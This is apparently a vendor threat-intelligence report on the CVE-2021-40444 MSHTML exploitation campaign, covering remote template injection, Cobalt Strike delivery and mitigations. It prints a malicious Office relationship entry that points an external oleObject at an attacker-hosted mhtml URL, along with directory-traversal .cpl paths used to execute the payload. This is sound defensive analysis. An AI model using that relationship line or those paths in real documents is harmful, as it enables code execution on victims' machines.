Trident Campaign: Microsoft Office RCE Zero-day Exploitation Techniques and Mitigation Measures

Summary

Following several attacks targeting the RCE flaw in MSHTML, CloudSEK Threat Intelligence Research team shares the TTPs and IOCs of the attack sequence.

Overview

MSHTML (Microsoft HTML) engine, aka Trident, is a browser engine developed by Microsoft for Internet Explorer. The Microsoft Office suite supports MSHTML, which is being abused by threat actors to gain code execution on targeted systems. Attackers craft a malicious ActiveX control, which is then abused by a Microsoft Office document that hosts the browser rendering engine. They then persuade the victim to open this malicious document, which in turn triggers the logical flaw in MSHTML. These malicious documents are delivered via Office 365. By default, the documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against such attacks. However, if the user continues to download the content bypassing the mitigation measures, the target machine will be exploited, and malware agents such as CobaltStrike Beacon are deployed. Microsoft Defender for Endpoint has been updated to flag such attacks, displaying a warning note that reads: “Suspicious Cpl File Execution.” Based on the quality of the vulnerability research and scale at which users are being targeted, it is most likely that an advanced adversary is responsible for the ongoing campaign. CloudSEK Threat Intelligence Research team has obtained malicious artifacts to retrieve the TTPs (Tactics, Techniques, and Procedures) used by the adversaries that leverage the MSHTML RCE bug to provide better security for our clients. This report provides the technical analysis of the campaign. Specifics regarding the exploit for the vulnerability have been intentionally withheld to avoid misuse in the public domain as a large number of systems continue to be susceptible.

Remote Template Injection Technique

Microsoft Word/ Excel documents are an archived collection of XML files that retain the information and data provided by the user while creating the document on corresponding Office applications. In simple words, one can easily unzip the doc files to see internal XML files that contain various metadata. The directory “word_rels” in unzipped Word/ Excel files plays a very significant role in weaponizing a seemingly benign document.

The process by which the users’ are attacked via Trident vulnerability

The directory ‘_rels’ stores relationship metadata which helps to fetch the template used by the document when it gets loaded by Office. An SMB address or HTTP URL of the asset controlled by the attacker can be provided to execute the malicious payload. For the remote template injection vector, we need to search for XML attributes, for which the TargetMode is set to ”External”. In this case, we could search for a malicious URL to exploit the code provided as a value to the attribute, where is external. Office, then, downloads the specific file that the particular URL points to.

<?** **xml version=** **"1.0"** **encoding=** **"UTF-8"** **standalone=** **"true"** **?> -< Relationships xmlns = http://schemas.openxmlformats.org/package/2006/relationships > < Relationship Target = “theme/theme1.xml” Type = http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme Id = “rId8” /> < Relationship Target = “webSettings.xml” Type = http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings Id = “rId3” /> < Relationship Target = “fontTable.xml” Type = http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable Id = “rId7” /> < Relationship Target = “settings.xml” Type = http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings Id = “rId2” /> < Relationship Target = “styles.xml” Type = http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles Id = “rId1” /> < Relationship Target = “mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html Type = http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject Id = “rId6” TargetMode = “External” /> < Relationship Target = “media/image2.wmf” Type = http://schemas.openxmlformats.org/officeDocument/2006/relationships/image Id = “rId5” /> < Relationship Target = “media/image1.jpeg” Type = http://schemas.openxmlformats.org/officeDocument/2006/relationships/image Id = “rId4” /> </ Relationships >

Remote template injection used in obtained Trident campaign samples The malicious docx sample, when executed, loads a webpage named ‘side.html’ , hosted on an attacker-controlled server via remote template injection. Since the campaign targets the MSHTML engine supported on Office platforms, loading the HTML document occurs naturally.

Exploitation

The malicious webpage ‘side.html’ fetched by the document contains a heavily obfuscated JavaScript code that exploits the CVE-2021-40444 vulnerability that has no official patch at the time of writing this report. Execution of this phase leads to retrieval of the final payload for command and control.

HTML contents of the malicious webpage ‘side.html’

Analysis of the exploit code after deobfuscating the JavaScript code gives us a fair idea about the complete exploitation process. Considering the sensitive nature of the issue, this report does not cover details of the vulnerability. A section of the deobfuscated exploit code is shown below. The attacker managed to reach the vulnerability using ActiveXObject to gain code execution. The code reaches out to the attacker’s server that hosts the final payload. The file ‘ministry.cab’ is a Windows cabinet file, very similar to a zip archive that contains Cobalt Strike beacon in the form of a CPL file, which masquerades as an INF file.

A section of the deobfuscated exploit code

The cabinet file is retrieved from a remote URL, and the INF file gets stored in one of the directories listed in the image below. The exploit code abuses directory traversal to execute the Cobalt Strike CPL beacon, which masquerades as ‘champion.inf’.

A section of the deobfuscated exploit code

A section of the deobfuscated exploit code

The cpl payload ‘ champion.inf ’, is eventually executed by ‘ rundll32.exe’ with the following command: ’ .cpl:…/…/…/AppData/Local/Temp/Low/championship.inf ’

Cobalt Strike Beacon

A basic image analysis shows that the ‘champion.inf’ file is, in fact, a 64-bit DLL (Dynamic Link Library) and its first bytes text is “MZ.” The CPL file is a control panel item that has code execution capabilities. A DLL becomes CPL when it exports a particular function called ‘CplApplet’ , which can be readily executed like a PE (Portable Executable).

Image analysis of ‘ Champion.inf ‘

Image analysis of ‘ Champion.inf ‘

Windows Defender flags this as “ Trojan: Win32/Agent.SA" , and the other security solutions flag it as “ Trojan.Win64.COBEACON.SUZ ."

Dynamic Analysis of the Exploit

When the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed as a result of the code execution is a Cobalt Strike beacon as discussed above. CloudSEK researchers recreated the exploit code and ran it to get a better understanding of the vulnerability. The researchers used Process Monitor to analyse the execution flow of the Office document (WINWORD.EXE) and found few interesting results that are shared below.

Loading of Vulnerable Module

Microsoft Word application loads mshtml.dll from Windows Directory. The vulnerability resides in one of the functionalities defined in the DLL files.

DLL files

Windows Directory DLL files

Based on CloudSEK’s testing, mshtml.dll is not loaded into WINWORD.EXE by default. When the attacker delivers an exploit written in HTML via Remote Template Injection, the handler provided in the attribute is mhtml. This leads to loading the mshtml module into the Word application to render the HTML page within the Word document.

File Writing

Final payload championship.inf is extracted from the initial ministry.cab archive file and is written to the Temp directory. This is probably caused by the vulnerability which is abused by adversaries to write user-controlled data on the file disk.

Code Execution

CloudSEK researchers also identified multiple control.exe processes that are spawned to execute the given CPL payload. Each of these processes search for the champion.inf file in directories that are hardcoded in the exploit. Here’s a list of the hardcoded directories to which the payload is dropped.

cpl:…/…/…/AppData/Local/Temp/Low/championship.inf
.cpl:…/…/…/AppData/Local/Temp/championship.inf
cpl:…/…/…/…/AppData/Local/Temp/Low/championship.inf
cpl:…/…/…/…/AppData/Local/Temp/championship.inf
.cpl:…/…/…/…/…/Temp/Low/championship.inf
.cpl:…/…/…/…/…/Temp/championship.inf
.cpl:…/…/Low/championship.inf
.cpl:…/…/championship.inf

The command lines provided to control.exe are shown in the image provided below. The argument provided is the location of the final payload and it is eventually executed by rundll32.

Guidelines

Based on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:

  • Disable ActiveX via Group Policy*
  • Disable ActiveX on individual systems via registry
  • Disable shell preview in Windows Explorer
  • Enterprise customers who manage updates should select the detection build 1.349.22.0

*Disabling ActiveX on Windows systems will have side effects depending on the user environment. For detailed information, refer to the official documentation issued by Microsoft.

Indicators of Compromise (IOCs)

image

image
image

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444

1 Like